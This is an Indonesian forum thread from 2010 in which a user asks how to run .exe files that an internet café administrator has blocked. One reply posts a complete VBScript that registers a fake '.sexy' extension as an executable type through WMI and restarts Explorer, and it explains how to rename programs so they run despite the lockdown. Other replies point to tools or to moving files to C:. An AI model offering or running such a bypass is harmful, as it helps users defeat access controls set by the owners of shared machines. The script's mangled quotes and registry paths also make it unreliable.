Page 1 of 1

hel me ,, ekstensi exe di warnet ga bisa jalan ,.

PostPosted: Wed Jan 27, 2010 11:55 am
by DISTRO911
kemarin waktu q buka aplikasi ada tulisan gini "You are not permitted to execute the following program "E:\idm.exe" Please contact your administrator if you require access"

gimana nie ?? mohon pencerahan para master . :kaca: :kaca: :maaf: :maaf:

Re: hel me ,, ekstensi exe di warnet ga bisa jalan ,.

PostPosted: Wed Jan 27, 2010 5:31 pm
by steventeen
cobain deh pake program securitynya om Poni....kalo nggak saLah masuk di bonus Xcode magazine 12....OK...

Re: hel me ,, ekstensi exe di warnet ga bisa jalan ,.

PostPosted: Tue Feb 09, 2010 3:13 pm
by kenthanx
const HKEY_CLASSES_ROOT = &H80000000
const HKEY_CURRENT_USER = &H80000001
QUOT = chr(34)
strComputer = “.”
On error resume next
Tanya = MsgBox(”By Pass Exelockdown dengan Registry Shell Spawning”& _
vbNewLine & “Reset Exelockdown?”, 36,”Exelockdown Hacking – by Lovepassword”)
If Tanya = 6 Then ‘Bila dipilih YA
Set objRegistry = GetObject(”winmgmts:{impersonationLevel=impersonate}!\” &strComputer & ” ootdefault:StdRegProv”)
objRegistry.CreateKey HKEY_CLASSES_ROOT, “.sexy”
objRegistry.SetStringValue HKEY_CLASSES_ROOT,”.sexy”,,”exefile”
objRegistry.SetStringValue HKEY_CLASSES_ROOT,”.sexy”,”Content Type”,”application/x-msdownload”
objRegistry.CreateKey HKEY_CLASSES_ROOT, “.sexyPersistentHandler”
objRegistry.SetStringValue HKEY_CLASSES_ROOT,”.sexyPersistentHandler”,,”{098f2470-bae0-11cd-b579-08002b30bfeb}”
objRegistry.CreateKey HKEY_CURRENT_USER, “SoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced”
objRegistry.SetDWORDValue HKEY_CURRENT_USER,”SoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced”,”HideFileExt”,0
Set objWMIService = GetObject(”winmgmts:” _
& “{impersonationLevel=impersonate}!\” & strComputer & ” ootcimv2?)
Set colProcessList = objWMIService.ExecQuery _
(”SELECT * FROM Win32_Process WHERE Name = ‘explorer.exe’”)
For Each objProcess in colProcessList
objProcess.Terminate()
Next
set objShell = createobject(”Wscript.Shell”)
objShell.Run “explorer.exe”
msgbox “Copi file exe, rename menjadi file sexy, lalu jalankan”,vbInformation,”Exelockdown Hacking – by 060183”
End If


Silakan copy paste di notepad lalu pilih all files dan simpan dengan extensi .vbs kemudian jalankan.
Kemudian ubah extensi file .exe yg kmu inginkan jadi .sexy lewat cmd
jalankan file *.sexy dari cmd

good luck :devil

Re: hel me ,, ekstensi exe di warnet ga bisa jalan ,.

PostPosted: Wed Feb 17, 2010 6:44 am
by Darkzzzz
Wuih... Mantab...
@TS
Mgkn warnetnya pake Anti-Executable dr Faronics atau prog sejenis ;)

Re: hel me ,, ekstensi exe di warnet ga bisa jalan ,.

PostPosted: Wed Feb 17, 2010 2:42 pm
by kenthanx
Cma share apa yang kebetulan kita taw aja...........

khan masih newbie......

:circle:

Re: hel me ,, ekstensi exe di warnet ga bisa jalan ,.

PostPosted: Mon Mar 01, 2010 7:55 pm
by A25414N
gimana klo vbs juga di blok??

soalnya ane dah pernah nyoba tp tetep ga bisa jalan

mohon pencerahannya

terimakasih

Re: hel me ,, ekstensi exe di warnet ga bisa jalan ,.

PostPosted: Tue Mar 09, 2010 9:20 pm
by 4ldh3
klo mau yg gampang...pindahin aja prog yg mw di jalanin ke C:....coz program2 windows semua berada di C....jd ga mgkin klo exe jg ga jalan d C :devil :devil